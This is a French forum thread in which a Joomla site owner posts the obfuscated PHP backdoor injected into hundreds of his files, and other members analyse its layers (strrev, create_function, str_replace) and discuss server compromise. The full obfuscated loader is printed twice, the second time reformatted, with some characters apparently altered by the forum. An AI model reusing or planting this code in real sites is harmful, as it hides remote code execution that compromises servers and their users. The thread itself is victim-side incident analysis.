Jump to content

Decryptage code PHP


Recommended Posts

Bonjour,

 

Un pirate a trouvé une faille sur mon site joomla, et injecte le code suivant dans plusieurs centaines de mes fichiers:

 

<?php $zhdlaryb = '8399#-!#65egb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Yq%7/7#@#7/7^#iubq# x5cq% x27jsv%6<C>^#zsfvr# x5cq%7**^#ww**WYsboepn)%bss-%rxB%h>#]y31]278]y3e]81]K7V;3q%}U;y]}R;2]},;osvufs} x27;mnui68]322]3]364]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]452f<*X&Z&S{ftmfV x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,`TW~ x24<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M# x7f<u%V x27{ftmfV x7zsfvr# x5cq%)ufttj x22)gj6<ps)%j:>1<%j:=tj{fpg)%s:*<%j:,,Bjg!)%j:>>1*!%b:>1<!fFEBFI,6<*127-UVPFNJU,6<*27-SFpjudovg}x;0]=])0#)U! x27{**u%-#jt0}Z;0]=]0{return chr(ord($n)-1);} #-!#~<%h00#*<%nfd)##Qtpz)#]341]88M4P8]37]278]225]241]334]3utjyf`4 x223}!+!<+{e%+*!*+fepdfe{h+{d%)+o^#Y# x5cq% x27Y%6<.msv`ftsbqA7>q%6< x7fw6* x7f_*#fubfstpqssutRe%)Rd%)Rb%))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:cee:5597f-s.973:8297f:5297e:56-xr.985:52985-t.98]K4]65]D8]86]y31]278]y x64"))) { $tfjizmc = " x63 162 x65 1x27&6<.fmjgA x27doj%6< x7fw6* x7f_*#fmjgk4`{6~6<tfs%w6< x7fw6* x7f_*#[k2`{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuo#]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6P2L5P6]y6gPnmamv = implode(array_map("mxwrnfp",str_split("%!*#opo#>>}R;msv}.;/#/ftmbg39*56A:>:8:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{hnpd175L3]248L3P6L1M5]D2P4]D6#<%G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]%w6Z6<.4`hA x27pd%6<pd%w6Z6<.3`hA x27pd%6<pd%w6Z6<.2`!gj!|!*1?hmg%)!gj!<**2-4-bubE{h%)sutcvt)esp>hmg%!<18:56985:6197g:74985-rr.93OJ`GB)fubfsdXA x27K6< x7fw6*3qjXA6~6<u%7>/7&6|7**111127-K)ebfsX x27u%)7fmjix6<C x27&6<*rfs%7-K)27id%6< x7fw6* x7f_*#ujojRk3`{666~6<&w6< x7fw6*CW&)7gj6<.[A x27&6< x22#)fepmqyfA>2b%!<*qp%-*.%)e4- x24b!>!%yy)#}#-# x24- x24-tusqpt)%z-#:#* x24- x24!>! x24/%tjojneb#-*f%)sfxpmpusut)]s]o]s]#)fepmqyf x27*&7-n%)utjm6< x7fw6*CW&)7gj6<*K)ftpmd]#-bubE{h%)tpqsut>j%!*72! x27!hmg%)!gj!<2,*j%-#1]#-bubE{h%)tpqs67R37,#/q%>U<#16,47R57,27R66,#/q%>2q%<#g6R85,67R37,18R#>hA x27pd%6<C x27pd%6|6.7eu{66~67<&w6<*&7-#o273qj%6<*Y%)fnbozcYufhA x272qj%6<^#zsfvr# x5c>b%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%}&;zepc}A;~!} x7f;!|!}{;)gj}l;33bq}k;oidk!~!<**qp%!-uyfu%)3#/},;#-#}+;%-qp%)54l} x27;%!<*#}_;#)323ldfid3:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%yy>)eobs`un>qp%!|Z~!<##!>!2p%!|!*!***b%)sfxpm,3,j%>j%!<**3-j%-bubE{h%)sutcvt-#w#)ldbqov>*ofmy%400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]38y]47]67y]37]88dof.)fepdof./#@#/qp%>5h%!<*::::::-111112*197-2qj%7-K)udfoopdXA x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFpusut!-#j0#!/!**#sfmcnbs+yfeobz+sfwjidsb`bj+upcotn+qsvmt+fw/ x24)% x24- x24y4 x24- x24]y8 x24- x24]26 x24- !**X)ufttj x22)gj!|!*nbsbq%)323ldffujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH# x27rfs%6~6QIQ&f_UTPI`QUUI&e_SEEB`FUPNFS&d_SFSFGFS`QUUI&c_UOFHBQi x5c1^W%c!>!%i x5c2^<!Ce*[! 125 x53 105 x52 137 x41 107 x45 116 x54"]); if ((st6]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%tww!>! x2tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<!%w:]88]5]48]32M3]317]445]212]445]43]321]464]284]364]6]234]342]58,%b:<!%c:>%s: x5c%j:^<!%w` x5c^>Ew:Qb:Qc:W~!%z!>2<!gps)%j>uas," x72 166 x3a 61 x31")) or (strstr($uas, 156 x61"])))) { $GLOBALS[" x61 156 x75 156 x61"]=1; $uas=strtol72]37y]672]48y]#>s%<#46< x7fw6<*K)ftpmdXA6|7*#)2q%l}S;2-u%!-#2#/#%#/#o]#/*)323zbe!-#jt0*?]+^?]_ x5c}X x2fjizmc("", $fenmamv); $opfzdky();}}x24- x24-!% x24- x24*!|1<%j=6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w2>j%!|!*#91y]c9y]g2y]#>>*7L6M7]D4]275]D:M8]Df#<%tdz>#L4]224)##-!#~<#/% x24- x24!>!fyqmpef)# x24*<!%t::!>! x24Ypp3)%cB%iN}#-! x!>!(%w:!>! x246767~6<Cw6<pd%w6Z6<.5`hA x27pd%6<pdI#)q%:>:r%:|:**t%)m%=*h%)m%):fmjix:<##:vd}R;*msv%)}.;`UQPMSVD!-id%>:h%:<#64y]552]e7y]#>n%<#372]58y]4of)fepdof`57ftbc x7f!|!*uyfu x27k:!ftmf!}Z;^nbsbq% x5cSFWSFT`%}X;!spf;!osvufs}w;* x7f!>> x22!pd%)!gj}Z;h!opjudovg}{;#)tutjyf`opjudovg)**f x27,*e x27,*d x27,*c x27,*b x27)fepsfebfI{*w%)kVx{**#k#)tutjyf`x x22l:!}ower($_SERVER[" x48 124 x54 120 x5f44#)zbssb!>!ssbnpe_GMFT`))1/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N}#-%o:W%c:>1<%b:>1<!g4- x24gps)%j>1<%j=tj{fpg)% x24- x24*<!~! x24/%t2w/ x]y76]277#<!%t2w>#]y74]273]y7%7> x2272qj%)7gj6<**2qj%)hopm3qjA)qj3hopmA x)tutjyf`opjudovg x22)!gj}1~!<2p% x7f!~!<##!>!2p%Z<^2fuopd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`ms>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c6]24]31#-%tdz*Wsfuvso!%bss x5csboemhpph#)zbssb!-#}#)fepmqnj!/!#0#)idubn`hfsq)!sp!*#>}&;!osvufs} x7f;!opjudovg}k~~9{d%:osvufs:~928>> x22:pjudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>> x22!ftmbg)!gdXk5`{66~6<&w6< x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA `SFTV`QUUI&b%!|!*)323zbek!~!<b% x7f!<Xj<*#k#)usbut`cpV x7f x7f x7f2]47y]252]18y]#>q%<#762]67y]562]38y]572]48y]#>m%:|:*r%:-t%)uqpuft`msvd},;uqpuft`msvd}+;!>!} x27;!>>>!}_;gvc%}&;ftmbg} x7" x61 156 x64 162 x6f 151mtf!%b:>%s: x5c%j:.2^4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!**#j{hnpd#mdR6<*id%)dfyfR x27tfs%6<*17-S! x24- x24 x5c%j^ x24- x24tvctus)% x2)utjm!|!*5! x27!hmg%)7fw6*CWtfs%)7gj6<*id%)ftp%cIjQeTQcOc/#00#W~!Ydrr)%rxB%epnbss!41 x74 145 x5f 146 x75 156 x63 164 x69 157 x6e"; function mxwrnfp($n) x24<!%ff2!>!bssbz) x24]25 x5c2b%!>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO x24/%tmw/ x24)%c*W%eN+#pp2)%zB%z>! x24/%tmw/ x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}3f]51L3]84]y31M6]y3e]81#/#7e:55946-tr.984:759855Ld]55#*<%bG9}:}.}-}!#*<%nfd>%fd4<!%tmw!>!#]y84]275]y83]273if((function_exists(" x6f 142 x5f 163 -#[#-#Y#-#D#-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(<!fwbm)%tjw)# x24#-!##QwTW%hIr x5c1^-%r x5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]82#-#!#-%tmw)%t]y38#-!%w:**<")));$opfzdky = $t)3of:opjudovg<~ x24<!%o:!>! x242178}527}88:}334}4729275fubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppde#)tgoj{hA!osvufs!~<3,j%>j%!*3! x27!hmg%!)!gj!<2,*j%!-#1!gj!|!*msv%)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubm@error_reporting(0); $fex74 141 x72 164") && (!isset($GLOBALS[" x61 156 x75ut>j%!*9! x27!hmg%)!gj!~<ofmy%GTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR xy]27]28y]#/r%/h%)n%-#+q%V<*#fopoV;hojepdoF.uofuopD#)y<Cb*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)#x24<%j,,*!| x24- x24gvodujpo! x24- x24y7 x24- x24*<! x2uhA)3of>2bd%!<5h%/#0#/*#npd/#)rrd/#00;quui#>.%!<*rstr($uas," x6d 163 x69 145")) or (strstr($STrrEvxNoITCnuF_EtaeRCxECaLPer_RtShbvtjmrvw'; $dkplquqy=explode(chr((477-357)),substr($zhdlaryb,(34636-28710),(184-150))); $jybeug = $dkplquqy[0]($dkplquqy[(6-5)]); $xvhcpp = $dkplquqy[0]($dkplquqy[(14-12)]); if (!function_exists('robqmsyuuh')) { function robqmsyuuh($telwmf, $apabbohiuv,$mmaphcjzy) { $adexbrluw = NULL; for($rvuvgq=0;$rvuvgq<(sizeof($telwmf)/2);$rvuvgq++) { $adexbrluw .= substr($apabbohiuv, $telwmf[($rvuvgq*2)],$telwmf[($rvuvgq*2)+(7-6)]); } return $mmaphcjzy(chr((29-20)),chr((511-419)),$adexbrluw); }; } $ztxsjbc = explode(chr((181-137)),'5126,38,5574,51,2975,64,3745,35,2641,52,5883,43,2931,44,4538,25,846,37,4795,69,540,25,5550,24,1041,48,2755,57,3386,49,1234,53,1815,43,1639,57,1394,64,2496,64,3062,22,2298,57,1363,31,3946,44,1858,45,49,55,391,27,664,54,4303,49,883,57,4734,25,4646,30,469,29,5655,37,1458,68,940,49,4042,38,3474,27,4476,62,3603,66,5484,66,5432,52,1696,63,5625,30,2149,49,4713,21,1287,51,3260,25,4584,62,3990,52,4891,47,1526,28,5834,49,3669,39,2258,40,2107,42,2355,58,4150,49,1617,22,718,60,3780,24,2560,52,4352,38,1903,34,2462,34,1975,21,3535,68,1089,21,1996,44,4199,53,1110,60,5378,54,623,41,4252,51,4390,28,370,21,245,56,1759,56,5714,30,3708,37,148,34,1937,38,498,42,3084,59,5099,27,3918,28,2693,62,2198,60,5692,22,3435,39,3501,34,3039,23,4418,58,5327,51,4864,27,3178,23,4676,37,1554,63,2413,49,5779,55,3866,52,3317,69,4938,22,2612,29,4759,36,4080,37,0,49,4960,60,5230,66,104,44,1338,25,778,68,5020,46,2040,67,989,52,3285,32,1170,64,5066,33,5744,35,565,58,182,63,2812,61,4117,33,3804,62,418,51,4563,21,2873,58,3201,59,301,69,5164,66,5296,31,3143,35'); $uzencuwe = $jybeug("",robqmsyuuh($ztxsjbc,$zhdlaryb,$xvhcpp)); $jybeug=$zhdlaryb; $uzencuwe(""); $uzencuwe=(395-274); $zhdlaryb=$uzencuwe-1; ?>

 

 

Je voudrais savoir comment décoder ce que fait ce code ? est-ce possible ?

 

En attendant je cherche la faille ?

 

Merci pour vos réponses.

Link to comment
Share on other sites

C'est possible, mais ça va être long, très lourd, il faut pouvoir essayer de recoller les retours à la ligne pour commencer (pour dé-concaténer un peu les fonctions), ensuite, faire les traductions (parce que certaines fonctions sont appelées caractère par caractère à partir d'un alphabet créé au début du script), bref, j'espère qu'il n'a pas trop eu l'occasion de s'en servir, parce que tu peux considérer que le serveur a été compromis. Suivant le fonctionnement de ton environnement web (apache avec php en module ou en fpm, les droits seront différents), il a pu également accéder à une ou plusieurs bases de données en fonction du compte utilisé pour le Joomla, autant dire que tu peux conseiller aux utilisateurs de changer de mot de passe sur les adresses mail qui sont concernées.

 

Ça va être long...

Link to comment
Share on other sites

Pas possible, du moins pas en l'état.

 

Le code est relativement court et simple, le problème vient du fait qu'il en manque un bout (ou que certains caractères sont mal passés lors du copier coller). Par exemple la première fonction appelée est "TrrEv", qui n'est pas une fonction PHP (ni à ma connaissance ni à celle de php.net).

 

A partir de là 3 possibilités :

 

1) le code ne fonctionne pas (je te le souhaite). C'est facile à vérifier : regarde si tu as des traces de TrrEv dans tes logs.

 

2) Il y a un include d'un fichier de lib commune quelque part qui définit ces fonctions : à toi de le trouver. Fouille éventuellement du côté de chaînes de caractères en base64 (via base64_decode) dans tes fichiers (c'est souvent utilisé pour éviter les recherche sur une fonction include par exemple, mais ça peut être une définition franche ou encore un fopen). Pour tracer tu pars de ton index et tu descends dans ton rendu en appelant la fonction TrrEv : si ça ne te renvoie pas une fatal error c'est que tu es trop descendu.

 

3) Le gentil monsieur a installé un module sur ton apache (ou le charge via un dl, mais dans ce cas cf point 2) ), auquel cas ça signifie qu'il a les droits root sur ton serveur et tu es bon pour un erase intégrale


<?php  $zhdlaryb = '8399#-!#65egb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Yq%7/7#@#7/7^#iubq# x5cq% x27jsv%6<C>^#zsfvr# x5cq%7**^#ww**WYsboepn)%bss-%rxB%h>#]y31]278]y3e]81]K7V;3q%}U;y]}R;2]},;osvufs} x27;mnui68]322]3]364]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]452f<*X&Z&S{ftmfV x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,`TW~ x24<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M# x7f<u%V x27{ftmfV x7zsfvr# x5cq%)ufttj x22)gj6<ps)%j:>1<%j:=tj{fpg)%s:*<%j:,,Bjg!)%j:>>1*!%b:>1<!fFEBFI,6<*127-UVPFNJU,6<*27-SFpjudovg}x;0]=])0#)U! x27{**u%-#jt0}Z;0]=]0{return chr(ord($n)-1);} #-!#~<%h00#*<%nfd)##Qtpz)#]341]88M4P8]37]278]225]241]334]3utjyf`4 x223}!+!<+{e%+*!*+fepdfe{h+{d%)+o^#Y# x5cq% x27Y%6<.msv`ftsbqA7>q%6< x7fw6* x7f_*#fubfstpqssutRe%)Rd%)Rb%))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:cee:5597f-s.973:8297f:5297e:56-xr.985:52985-t.98]K4]65]D8]86]y31]278]y x64"))) { $tfjizmc = " x63 162 x65 1x27&6<.fmjgA x27doj%6< x7fw6* x7f_*#fmjgk4`{6~6<tfs%w6< x7fw6* x7f_*#[k2`{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuo#]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6P2L5P6]y6gPnmamv = implode(array_map("mxwrnfp",str_split("%!*#opo#>>}R;msv}.;/#/ftmbg39*56A:>:8:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{hnpd175L3]248L3P6L1M5]D2P4]D6#<%G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]%w6Z6<.4`hA x27pd%6<pd%w6Z6<.3`hA x27pd%6<pd%w6Z6<.2`!gj!|!*1?hmg%)!gj!<**2-4-bubE{h%)sutcvt)esp>hmg%!<18:56985:6197g:74985-rr.93OJ`GB)fubfsdXA x27K6< x7fw6*3qjXA6~6<u%7>/7&6|7**111127-K)ebfsX x27u%)7fmjix6<C x27&6<*rfs%7-K)27id%6< x7fw6* x7f_*#ujojRk3`{666~6<&w6< x7fw6*CW&)7gj6<.[A x27&6< x22#)fepmqyfA>2b%!<*qp%-*.%)e4- x24b!>!%yy)#}#-# x24- x24-tusqpt)%z-#:#* x24- x24!>! x24/%tjojneb#-*f%)sfxpmpusut)]s]o]s]#)fepmqyf x27*&7-n%)utjm6< x7fw6*CW&)7gj6<*K)ftpmd]#-bubE{h%)tpqsut>j%!*72! x27!hmg%)!gj!<2,*j%-#1]#-bubE{h%)tpqs67R37,#/q%>U<#16,47R57,27R66,#/q%>2q%<#g6R85,67R37,18R#>hA x27pd%6<C x27pd%6|6.7eu{66~67<&w6<*&7-#o273qj%6<*Y%)fnbozcYufhA x272qj%6<^#zsfvr# x5c>b%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%}&;zepc}A;~!} x7f;!|!}{;)gj}l;33bq}k;oidk!~!<**qp%!-uyfu%)3#/},;#-#}+;%-qp%)54l} x27;%!<*#}_;#)323ldfid3:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%yy>)eobs`un>qp%!|Z~!<##!>!2p%!|!*!***b%)sfxpm,3,j%>j%!<**3-j%-bubE{h%)sutcvt-#w#)ldbqov>*ofmy%400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]38y]47]67y]37]88dof.)fepdof./#@#/qp%>5h%!<*::::::-111112*197-2qj%7-K)udfoopdXA x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFpusut!-#j0#!/!**#sfmcnbs+yfeobz+sfwjidsb`bj+upcotn+qsvmt+fw/ x24)% x24- x24y4 x24- x24]y8 x24- x24]26 x24- !**X)ufttj x22)gj!|!*nbsbq%)323ldffujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH# x27rfs%6~6QIQ&f_UTPI`QUUI&e_SEEB`FUPNFS&d_SFSFGFS`QUUI&c_UOFHBQi x5c1^W%c!>!%i x5c2^<!Ce*[! 125 x53 105 x52 137 x41 107 x45 116 x54"]); if ((st6]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%tww!>! x2tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<!%w:]88]5]48]32M3]317]445]212]445]43]321]464]284]364]6]234]342]58,%b:<!%c:>%s: x5c%j:^<!%w` x5c^>Ew:Qb:Qc:W~!%z!>2<!gps)%j>uas," x72 166 x3a 61 x31")) or (strstr($uas, 156 x61"])))) { $GLOBALS[" x61 156 x75 156 x61"]=1; $uas=strtol72]37y]672]48y]#>s%<#46< x7fw6<*K)ftpmdXA6|7*#)2q%l}S;2-u%!-#2#/#%#/#o]#/*)323zbe!-#jt0*?]+^?]_ x5c}X x2fjizmc("", $fenmamv); $opfzdky();}}x24- x24-!% x24- x24*!|1<%j=6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w2>j%!|!*#91y]c9y]g2y]#>>*7L6M7]D4]275]D:M8]Df#<%tdz>#L4]224)##-!#~<#/% x24- x24!>!fyqmpef)# x24*<!%t::!>! x24Ypp3)%cB%iN}#-! x!>!(%w:!>! x246767~6<Cw6<pd%w6Z6<.5`hA x27pd%6<pdI#)q%:>:r%:**t%)m%=*h%)m%):fmjix:<##:vd}R;*msv%)}.;`UQPMSVD!-id%>:h%:<#64y]552]e7y]#>n%<#372]58y]4of)fepdof`57ftbc x7f!|!*uyfu x27k:!ftmf!}Z;^nbsbq% x5cSFWSFT`%}X;!spf;!osvufs}w;* x7f!>> x22!pd%)!gj}Z;h!opjudovg}{;#)tutjyf`opjudovg)**f x27,*e x27,*d x27,*c x27,*b x27)fepsfebfI{*w%)kVx{**#k#)tutjyf`x x22l:!}ower($_SERVER[" x48 124 x54 120 x5f44#)zbssb!>!ssbnpe_GMFT`))1/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N}#-%o:W%c:>1<%b:>1<!g4- x24gps)%j>1<%j=tj{fpg)% x24- x24*<!~! x24/%t2w/ x]y76]277#<!%t2w>#]y74]273]y7%7> x2272qj%)7gj6<**2qj%)hopm3qjA)qj3hopmA x)tutjyf`opjudovg x22)!gj}1~!<2p% x7f!~!<##!>!2p%Z<^2fuopd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`ms>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c6]24]31#-%tdz*Wsfuvso!%bss x5csboemhpph#)zbssb!-#}#)fepmqnj!/!#0#)idubn`hfsq)!sp!*#>}&;!osvufs} x7f;!opjudovg}k~~9{d%:osvufs:~928>> x22:pjudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>> x22!ftmbg)!gdXk5`{66~6<&w6< x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA `SFTV`QUUI&b%!|!*)323zbek!~!<b% x7f!<Xj<*#k#)usbut`cpV x7f x7f x7f2]47y]252]18y]#>q%<#762]67y]562]38y]572]48y]#>m%:*r%:-t%)uqpuft`msvd},;uqpuft`msvd}+;!>!} x27;!>>>!}_;gvc%}&;ftmbg} x7" x61 156 x64 162 x6f 151mtf!%b:>%s: x5c%j:.2^4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!**#j{hnpd#mdR6<*id%)dfyfR x27tfs%6<*17-S! x24- x24 x5c%j^ x24- x24tvctus)% x2)utjm!|!*5! x27!hmg%)7fw6*CWtfs%)7gj6<*id%)ftp%cIjQeTQcOc/#00#W~!Ydrr)%rxB%epnbss!41 x74 145 x5f 146 x75 156 x63 164 x69 157 x6e"; function mxwrnfp($n) x24<!%ff2!>!bssbz) x24]25 x5c2b%!>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO x24/%tmw/ x24)%c*W%eN+#pp2)%zB%z>! x24/%tmw/ x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}3f]51L3]84]y31M6]y3e]81#/#7e:55946-tr.984:759855Ld]55#*<%bG9}:}.}-}!#*<%nfd>%fd4<!%tmw!>!#]y84]275]y83]273if((function_exists(" x6f 142 x5f 163 -#[#-#Y#-#D#-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(<!fwbm)%tjw)# x24#-!##QwTW%hIr x5c1^-%r x5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]82#-#!#-%tmw)%t]y38#-!%w:**<")));$opfzdky = $t)3of:opjudovg<~ x24<!%o:!>! x242178}527}88:}334}4729275fubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppde#)tgoj{hA!osvufs!~<3,j%>j%!*3! x27!hmg%!)!gj!<2,*j%!-#1!gj!|!*msv%)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubm@error_reporting(0); $fex74 141 x72 164") && (!isset($GLOBALS[" x61 156 x75ut>j%!*9! x27!hmg%)!gj!~<ofmy%GTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR xy]27]28y]#/r%/h%)n%-#+q%V<*#fopoV;hojepdoF.uofuopD#)y<Cb*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)#x24<%j,,*!| x24- x24gvodujpo! x24- x24y7 x24- x24*<! x2uhA)3of>2bd%!<5h%/#0#/*#npd/#)rrd/#00;quui#>.%!<*rstr($uas," x6d 163 x69 145")) or (strstr($STrrEvxNoITCnuF_EtaeRCxECaLPer_RtShbvtjmrvw'; $dkplquqy=explode(chr((477-357)),substr($zhdlaryb,(34636-28710),(184-150)));  $jybeug = $dkplquqy[0]($dkplquqy[(6-5)]);  $xvhcpp = $dkplquqy[0]($dkplquqy[(14-12)]);  if (!function_exists('robqmsyuuh'))  { 	function robqmsyuuh($telwmf, $apabbohiuv,$mmaphcjzy)	{ 		$adexbrluw = NULL; 		for($rvuvgq=0;$rvuvgq<(sizeof($telwmf)/2);$rvuvgq++) 		{ 			$adexbrluw .= substr($apabbohiuv, $telwmf[($rvuvgq*2)],$telwmf[($rvuvgq*2)+(7-6)]); 		} 		return $mmaphcjzy(chr((29-20)),chr((511-419)),$adexbrluw); 	}; } $ztxsjbc = explode(chr((181-137)),'5126,38,5574,51,2975,64,3745,35,2641,52,5883,43,2931,44,4538,25,846,37,4795,69,540,25,5550,24,1041,48,2755,57,3386,49,1234,53,1815,43,1639,57,1394,64,2496,64,3062,22,2298,57,1363,31,3946,44,1858,45,49,55,391,27,664,54,4303,49,883,57,4734,25,4646,30,469,29,5655,37,1458,68,940,49,4042,38,3474,27,4476,62,3603,66,5484,66,5432,52,1696,63,5625,30,2149,49,4713,21,1287,51,3260,25,4584,62,3990,52,4891,47,1526,28,5834,49,3669,39,2258,40,2107,42,2355,58,4150,49,1617,22,718,60,3780,24,2560,52,4352,38,1903,34,2462,34,1975,21,3535,68,1089,21,1996,44,4199,53,1110,60,5378,54,623,41,4252,51,4390,28,370,21,245,56,1759,56,5714,30,3708,37,148,34,1937,38,498,42,3084,59,5099,27,3918,28,2693,62,2198,60,5692,22,3435,39,3501,34,3039,23,4418,58,5327,51,4864,27,3178,23,4676,37,1554,63,2413,49,5779,55,3866,52,3317,69,4938,22,2612,29,4759,36,4080,37,0,49,4960,60,5230,66,104,44,1338,25,778,68,5020,46,2040,67,989,52,3285,32,1170,64,5066,33,5744,35,565,58,182,63,2812,61,4117,33,3804,62,418,51,4563,21,2873,58,3201,59,301,69,5164,66,5296,31,3143,35'); $uzencuwe = $jybeug("",robqmsyuuh($ztxsjbc,$zhdlaryb,$xvhcpp));  $jybeug=$zhdlaryb; $uzencuwe("");  $uzencuwe=(395-274);  $zhdlaryb=$uzencuwe-1;  ?>

Le code version lisible.

 

Par contre encore une fois il très est possible vu la tronche de l'alphabet de cryptage que certains caractères aient été convertis par le forum. Genre Trrev c'est très proche de strrev qui existe bel et bien. Si tu as possibilité d'uploader un des fichiers corrompu quelque part et de donner le lien ça permettrait d'obtenir plus d'informations.

 

 

Edit : Ouais, bon, les caractères sont mal passés : en partant du postulat que $dkplquqy[0] correspond bel et bien à strrev on obtient $jybeug = 'create_function' et $xvhcpp = str_replace à plus ou moins un caractère. Tu sais donc ce qu'il te reste à faire si tu veux plus d'infos ;)

Link to comment
Share on other sites

j'espère qu'il n'a pas trop eu l'occasion de s'en servir, parce que tu peux considérer que le serveur a été compromis. Suivant le fonctionnement de ton environnement web (apache avec php en module ou en fpm, les droits seront différents), il a pu également accéder à une ou plusieurs bases de données en fonction du compte utilisé pour le Joomla, autant dire que tu peux conseiller aux utilisateurs de changer de mot de passe sur les adresses mail qui sont concernées.

 

Oui pour le serveur compromis, non pour le reste.

 

A vu de nez (et tant que l'on aura pas l'alphabet entier ça restera de la supposition), le code généré est bien trop court pour une exploitation stricto sensu. Ca ressemble plutôt à un rootkit : le gars s'est certainement créé un compte ou a exécuté une fonction bash quelconque via exec ou autre. C'est là que les emmerdes commencent vraiment....

Link to comment
Share on other sites

Ok, je me suis amusé un peu avec le code fourni.

 

Premier point : impossible de savoir ce que fait le code sans avoir l'alphabet correct (trop de layers, ce qui est un caractère de décalage au layer 1 devient incompréhensible au layer 3.... et il y a des couches et des couches).

 

Deuxième point : c'est très étrange.... c'est TRES évolué pour un truc de script kiddie... genre vraiment ! Ca fait plus de 10 ans que je suis dev web en pro (un peu plus que dev d'ailleurs), des hacks j'en ai vu passé, des obfuscations bien plus.... ca j'ai jamais vu. Généralement t'as un base64_decode, éventuellement un layer, 2 grand max.... Là j'en ai identifié 6 avant d'être complètement paumé (trop de décalage par la suite : si je suis capable de deviner que Trrev = strrev, j'ai déjà plus de mal quand j'arrive à "w135656")...

 

Tu as des alphabets qui génèrent des fonctions qui elles-mêmes génèrent des alphabets qui génèrent des fonctions.... le tout en récursif. C'est impressionnant ! J'ai utilisé des outils vendus une blinde qui ne faisaient pas une obfuscation moitié aussi forte...

 

Ca titille (fortement) ma curiosité.... Par contre on va arrêter là en publique. Le reste se fera en mp... je veux savoir dans quoi je mets les pieds si je dois me plonger dans ce merdier. J'ai quelques doutes sur le fait que ça soit une attaque sur un site perso pour commencer (et si je suis parfaitement volontaire pour aider un dev débutant je ne travaille pas gratos pour une société commerciale, question de principe).

 

Du coup si tu veux donner suite tu peux me contacter....

 

Edit : ce que je peux dire avec une quasi certitude née de l'expérience par contre, c'est que le mec capable de ça il en a rien à carrer de tes données, d'ailleurs j'ai vu aucune trace de tentative d'accès à une quelconque donnée de joomla dans les 3 layers que j'ai plus ou moins décodé. Après si tu es représentant d'une multinationale c'est peut être faux, mais si c'était le cas tu ne viendrais pas demander ici... Je ne sais pas ce que fait ce code, mais j'ai l'intuition que tu es victime collatérale d'un truc bien plus gros...

Link to comment
Share on other sites

Merci pour vos réponses. C'est un peu technique, je comprend pas tout, mais je vais essayer de vous donner d'autres détails. 

 

Cette attaque à lieu sur un serveur mutualisé Nuxit sur lequel j'ai 4 sites hébergés en joomla ( dans 4 repertoires differents ). j'ai rien a caché, voila les sites:

 

http://www.canyon65hautespyrenees.com/

http://www.canyoning-sierra-de-guara-espagne.com/

http://www.speleo65hautespyrenees.com/

http://www.rando65hautespyrenees.com/

 

Et oui je suis moniteur de plein air.

 

